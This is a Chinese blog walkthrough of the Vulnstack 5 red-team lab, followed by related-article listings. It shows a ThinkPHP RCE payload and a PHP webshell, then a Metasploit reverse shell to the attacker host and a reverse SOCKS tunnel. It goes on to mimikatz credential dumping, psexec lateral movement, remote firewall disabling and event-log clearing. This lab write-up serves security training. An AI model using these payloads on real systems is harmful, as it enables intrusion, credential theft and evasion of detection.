Vulnstack----5、ATT&CK红队评估实战靶场五

最新推荐文章于 2024-05-16 12:25:49 发布
最新推荐文章于 2024-05-16 12:25:49 发布
阅读量2.1k 收藏 20
点赞数 4
分类专栏: # Vulnstack 靶场集合 文章标签: Vulnstack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/131185663
版权

文章目录

一 环境搭建

1、项目地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

2、环境拓扑

3、网络配置信息

1.VMware新建网卡VMnet6,选择仅主机模式,并将网段IP设置为192.168.138.0

2.Win7设置双网卡,一个网卡选择VMnet6、另一个NAT
  模拟外网IP:192.168.111.129(在Win7主机开启IP自动获取)
  内网IP:192.168.138.136
  账号密码:sun\heart 123.com 和 sun\Administrator dc123.com

3.Windows 2008 连接VMnet6
  内网IP:192.168.138.138
  sun\admin 2020.com

4.攻击机器Kali连接NAT
  IP:192.168.111.128

4、开启web环境

二 外网渗透

1.端口扫描

nmap -T4 -sC -sV 192.168.111.129

2.访问80端口

http://192.168.111.129

#尝试页面报错,获取thinkphp具体版本
http://192.168.111.129/?s=1

3.搜索thinkphp相关漏洞

searchsploit thinkphp

4.最后一条为RCE,查看46150.txt

cd /usr/share/exploitdb/exploits/php/webapps
cat 46150.txt

漏洞描述: 由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 $_POST[‘_method’] 来传递真实的请求方法。但由于框架没有对参数进行验证,导致攻击者可以设置 $_POST[‘_method’]=‘__construct’ 而让该类的变量被覆盖。攻击者利用该方式将filter变量覆盖为system等函数名,当内部进行参数过滤时便会进行执行任意命令。

5.使用payload进行攻击测试,whoami执行成功

http://192.168.111.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

6.写入webshell

#写入webshell的命令
echo "<?php @eval($_POST[whoami]);?>" > shell.php

http://192.168.111.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST[whoami]);?>" > shell.php

http://192.168.111.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

7.蚁剑连接

shell:http://192.168.111.129/shell.php

三 内网信息收集

ipconfig /all   # 查看本机ip,所在域
route print     # 打印路由信息
net view        # 查看局域网内其他主机名
arp -a          # 查看arp缓存
whoami          # 查看当前用户
net start       # 查看开启了哪些服务
net share       # 查看开启了哪些共享 
net config workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators   # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "domain controllers" /domain  # 查看域控制器(可能有多台)

3.1 本机信息收集

1.执行ipconfig
双网卡,外网ip:192.168.111.129,内网ip:192.168.138.136

2.执行whoami
administrator 管理员账户

3.执行 net config workstation
域环境名为 sun

3.2 域内信息收集

1.net user /domain
查看域用户

2.net group "domain computers" /domain
查看域内主机

3.net group "domain controllers" /domain
查看域控制器

4.net group "domain admins" /domain
查看域管理员

5.ping DC.sun.com
域控制器为DC$,域名为sun.com域管理员为Administrator。ping DC$得到域控的IP:192.168.138.138

四 横向移动

4.1 路由转发和代理通道

1.生成一个Meterpreter

Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。

# 生成一个powershell类型的payload
use exploit/multi/script/web_delivery
set target 2    # 选择使用powershell类型的payload
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.111.128
run

蚁剑执行生成的payload,反弹回一个meterpreter的shell

2.添加路由
在msfconsole里面添加一个通向192.168.138.0网段的路由

route add 192.168.138.0 255.255.255.0 1
route print

3.搭建代理通道

攻击端上传ew_for_linux64并执行如下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

Win7上传ew_for_Win.exe并执行如下命令:

start ew_for_Win.exe -s rssocks -d 192.168.111.128 -e 1234

4.配置proxychain
将socks5服务器指向127.0.0.1:1080,便可以使用proxychains将我们的程序代理进内网。

vim /etc/proxychains4.conf

4.2 抓取域用户密码

1.使用wiki模块抓取密码

load kiwi

注意结尾警告:64位机器上运行32的Kiwi

2.进程迁移

 # 可以看到x64 和 x86的进程
 ps 

# 通过进程id,选择一个64为进程进行迁移
migrate pid

3.密码抓取

kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

抓取到域管理员账号密码:Administrator:Test@1234

4.3 使用Psexec登录域控

1.使用exploit/windows/smb/psexec模块

use exploit/windows/smb/psexec
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrator
set SMBPass Test@1234
set payload windows/meterpreter/bind_tcp
run

2.远程关闭域控防火墙
sessions创建失败,可能是由于防火墙导致,远程关闭。

net use \\192.168.138.138\ipc$ "Test@1234" /user:"administrator"
net use

利用sc创建服务来远程关闭Windows 2008的防火墙

#创建服务
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
#启动服务
sc \\192.168.138.138 start unablefirewall

3.使用exploit/windows/smb/psexec模块

4.4 3389远程登录

1.开启域控3389远程桌面

use post/windows/manage/enable_rdp
set session 1
run

2.登录域控

五、痕迹清理

1.查看事件日志

run event_manager -i

2.清除事件日志(包括六种日志类型)

run event_manager -c
李沉肩
关注
专栏目录
ATT&CK实战系列——红队实战()
lza20001103的博客
10-17 2575
ATT&CK实战系列——红队实战() 文章目录ATT&CK实战系列——红队实战()前言靶场搭建网络配置外网渗透内网渗透内网信息收集msf反弹shell设置路由探测内网存活主机cs上线横向移动fscan扫描内网主机端口拿下域控后记 前言 前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。 靶场搭建 靶场下载
渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 223
ATT&CK红队评估(红日靶场二)
红日(vulnstack)5 内网渗透ATT&CK实战
m0_66299232的博客
03-27 597
win7 192.168.138.136 (仅主机模式) 192.168.135.150 (NET模式)4.要先run mimikatz拿到密码信息,再填好空格,点击launch 等一会域控就上线了。net group "domain computers" /domain //查看域控。3.成功拿到shell, 执行迁移进程命令, 系统会自动寻找合适的进程然后迁移。9.发现有ms17-010漏洞,并且开放139,135,445端口。4.发现存在漏洞,直接点getshell用蚁剑去连接。
vulnstack
干铮的博客
05-30 1277
1.信息收集 主机发现 sudo netdiscover eth0 -r 192.168.31.0/24 端口扫描 nmap -A 192.168.31.57 -p- -sV -oN nmap.a goby漏扫 2.漏洞利用 goby 通用poc写webshell echo ^<?php @eval($_POST['123']) ?^> > #注意”>“字符需要转义 type shell.php 蚁剑连接webshell 3.
vulnstack红队5
Jim2g
07-29 442
1:搭建好靶场 外网 192.168.135.0/24 内网 192.168.138.0/24 2:访问 win7 搭建的网站 3:扫描目录 4:访问下robots.txt 和add.php ,没有太大价值。尝试下暴力破解这个地方。 5:还真跑出来了,字典强大就是好啊 6:这还不简单直接上马getshell 7:上传木马,蚁剑连接 8:看下内网,发下还有一台主机 9:在基本信息里面存在域控域名为sun.com 10:查看域用户权限不够,算了直接搞内网吧 11:用cs生成木马传到主机并且运
内网之靶场VulnStack红队
shy的博客
11-13 2339
环境搭建: 外网:192.168.135.0 内网:192.168.138.0 边界机器:win7 外网:192.168.135.150 内网:192.168.138.136 账号: heart 123.com #本地管理员用户 sun\Administrator dc123.com #域管用户 内网机器:winserver 2008 内网:192.168.138.136 账号: sun\admin 2020.com #由于需要改密码,我更改为2020.com1...
【红日靶场vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2298
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
ATT&CK实战系列-红队实战(三) VulnStack靶场
weixin_68652890的博客
05-11 601
信息搜集 nmap 扫192.168.5.0/24网段 目标主机开启22 80 3306 思路:22 ssh爆破 远程连接 80 从网站getshell 3306 mysql 外联(数据库配置文件) 先访问80 指纹识别 joomla cms msf探测版本为3.9.12 没找到exp 用dirsearch 扫到后台 和数据库配置文件configuration.php~ 泄露数据库账号和密码 用Navicat连接数据库 [外链图片转存失败,源站可能有防盗链机制,建议
ATT&CK实战系列-红队实战(一)vulnstack 红日靶场
weixin_68652890的博客
05-20 1731
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
ATT&CK红队评估(红日靶场二)
weixin_45682839的博客
04-11 2841
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
vulnstack-ATT&CK实战系列 红队实战(一)
qq_41755084的博客
02-21 462
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019漏洞详情 (qiyuanxuetang.net)
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5573
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-30 1679
ATT&CK红队评估(红日靶场)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
渗透靶场--vulnstack-红队评估实战(5)
weixin_45794666的博客
07-20 872
vulnstack-红队评估实战(5) 环境配置 win7 sun\heart 123.com sun\Administrator dc123.com 内网:192.168.138.136 外网:192.168.154.140 启动phpstudy 2008 sun\admin 2021.com 192.168.138.138 kali 192.168.154.129 1.对外网主机进行信息搜集 开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22 搜索
完全模拟ATT&CK实战靶场
tangshuangsss的专栏
04-16 410
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本...
红日安全ATTCK靶机实战系列之vulnstack5
黑白的博客
04-25 5917
typora-root-url: pic 声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet4,192.168.138.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直.
vulstack红队评估()
PANDA墨森的博客
06-22 997
原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118352.html 一、环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: Win7: heart 123.com #本地管理员用户 sun\Administrator dc123.com #域管用户,改为了panda123.. Win2008: sun\admin 2020.com #由于需要改密码,我更改为panda666... ②虚拟机网卡设置 Wi...
ATT&CK靶场系列(
qq_1873822的博客
12-05 3334
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com Win7双网卡模拟内外网 2008 sun\admin 2020.com 网络环境配置如下: 二、前期信息收集 使用nmap对外网ip段进行信息收集 nmap -A -v -T4 192.168.135.15
红队靶场VulnStack5红日安全,域横向,移动反弹sehll,thikphpV5.0的RCE漏洞
最新发布
m0_58116751的博客
05-16 1152
远程命令执行是使用此模块的攻击向量的一个很好的例子。再kali上添加socks的代理文件 编辑/etc/proxychains.conf文件,将socks5服务器指向127.0.0.1的1080端口,之后便可以使用proxychains将我们的程序代理进内网了。没关系,既然有了域管理员的密码,我们可以尝试关闭Windows 2008的防火墙。我们systeminfo查看他的一个系统信息,第一次查看无回显之后将蚁剑连接数据删除后再尝试就有回显了可能是一个蚁剑的小问题,多尝试就好了。
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有直接使用和体验过红日靶场VulnStack1,因此无法提供具体的实际体验和操作步骤。但是,我可以帮助回答一些关于网络安全、漏洞攻防等方面的问题。 如果您有关于网络安全、漏洞攻防或者其他相关的问题,请告诉我,我会尽力帮助您解答。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值